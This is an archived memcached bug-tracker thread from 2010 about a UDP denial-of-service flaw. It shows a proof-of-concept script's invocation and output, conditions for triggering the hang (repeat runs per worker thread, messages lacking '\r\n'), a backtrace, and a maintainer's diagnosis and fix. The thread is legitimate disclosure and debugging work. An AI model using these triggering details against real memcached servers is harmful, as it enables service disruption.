Closed GoogleCodeExporter closed 9 years ago
I omitted to mention that once the UDP channel stops responding, the memcached
process consumes 100% cpu; in this way the bug indirectly affects users of the
TCP channel too as well as other processes on the same machine.
Original comment by marcolsl...@gmail.com
on 6 Oct 2010 at 9:50
Original comment by eric.d.l...@gmail.com
on 6 Oct 2010 at 5:28
Just FYI, was not able to reproduce this on mac using 1.4.5 with libevent
2.07-rc ... will take a look on linux when I get a chance.
smacky:Downloads elambert$ python ./largeudp.py a localhost 11211 1200
[-] Using ascii protocol. Good choice!
[-] Creating socket
[-] Is memcached responding? Yes
[-] Great, server responds
[-] Sending large packet with size 1208
[-] Timeout expired waiting for response to large packet
[-] Is memcached responding? Yes
[E] DoS appears to have failed
smacky:Downloads elambert$ echo "stats" | nc localhost 11211 | egrep
"version|libevent"
STAT version 1.4.5_1_gb4936c4
STAT libevent 2.0.7-rc
smacky:Downloads elambert$ uname -a
Darwin smacky.local 10.4.0 Darwin Kernel Version 10.4.0: Fri Apr 23 18:28:53
PDT 2010; root:xnu-1504.7.4~1/RELEASE_I386 i386 i386
smacky:Downloads elambert$
Original comment by eric.d.l...@gmail.com
on 7 Oct 2010 at 8:58
Thanks for the feedback, apologies for supplying a PoC that didn't demo the
issue sufficiently, that was pretty fail for a PoC. However, I believe the bug
to still be present, as I'll show below. I'm less sure as to the cause: large
packet sizes trigger the bug sooner, but using a packet size of 10 also
triggers the bug on my side, eventually.
I can trigger the bug on Snow Leopard (Darwin insurrection.local 10.4.0 Darwin
Kernel Version 10.4.0: Fri Apr 23 18:28:53 PDT 2010;
root:xnu-1504.7.4~1/RELEASE_I386 i386) by running the PoC four times (works for
both ascii and binary protocols) using a packet size of 1200. This too is the
case on Linux, repeating the PoC four times triggers the bug.
Below is an OSX backtrace after the bug had been triggered, and memcached was
consuming full CPU:
(gdb) bt
#0 0x00007fff85ab508a in kevent ()
#1 0x00000001000300e3 in kq_dispatch ()
#2 0x000000010002380e in event_base_loop ()
#3 0x0000000100002be7 in main (argc=3, argv=0x7fff5fbff9b0) at memcached.c:4681
(Note: the libevent for the OSX version was 1.4.2. Latest libevent was on Linux)
Not much to go on, I'm afraid.
It may also help to mention that if "-v -v" is enabled then once the bug is
triggered, no further debug messages are printed to the console for UDP comms.
TCP traffic still generates the regular debug notices.
Original comment by marcolsl...@gmail.com
on 7 Oct 2010 at 11:08
I think i have somewhat of an idea as to what is happening. The UDP connections
behave a little bit different than TCP. At start up, the server creates a UDP
"connection handler" for each thread in the server (as controlled by the -t
option). By default there are 4 threads so there will be 4 UDP "connection
handlers".
What appears to be happening is that the message you are sending is not a
valid/wellformed message which causes the server to close the "connection
handler" in such a way that it can not be used again. So in a default scenario
with the server running 4 threads, the first time you run your test one connect
handler is closed leaving three left, the second run closes a second handler
leaving two left and so on. If you start the server with only one thread (-t 1)
you should hit the issue on the first run.
I dont have a root cause yet, but the issue does appear to be related to how
the server clears up the connection handler when it encounters a problem. Will
let you know when I've figured this out
Original comment by eric.d.l...@gmail.com
on 8 Oct 2010 at 4:48
Original comment by eric.d.l...@gmail.com
on 8 Oct 2010 at 4:49
Well spotted, I was indeed running the initial tests with -t 1. At least that
clears up some minor confusion this side.
Original comment by marcolsl...@gmail.com
on 8 Oct 2010 at 9:26
possible the same cause as for:
http://code.google.com/p/memcached/issues/detail?id=106
Original comment by airat.ha...@gmail.com
on 13 Dec 2010 at 10:53
if you end up the message with "\r\n" - you won't be able to reproduce the bug.
Original comment by airat.ha...@gmail.com
on 14 Dec 2010 at 3:19
The patch for 1.4.7 related to #106 fixes this guy too.
Going to close out this bug and leave any further discussion on the earlier
issue.
Original comment by dorma...@rydia.net
on 8 Aug 2011 at 5:46
Original issue reported on code.google.com by
marcolsl...@gmail.com
on 5 Oct 2010 at 10:02Attachments: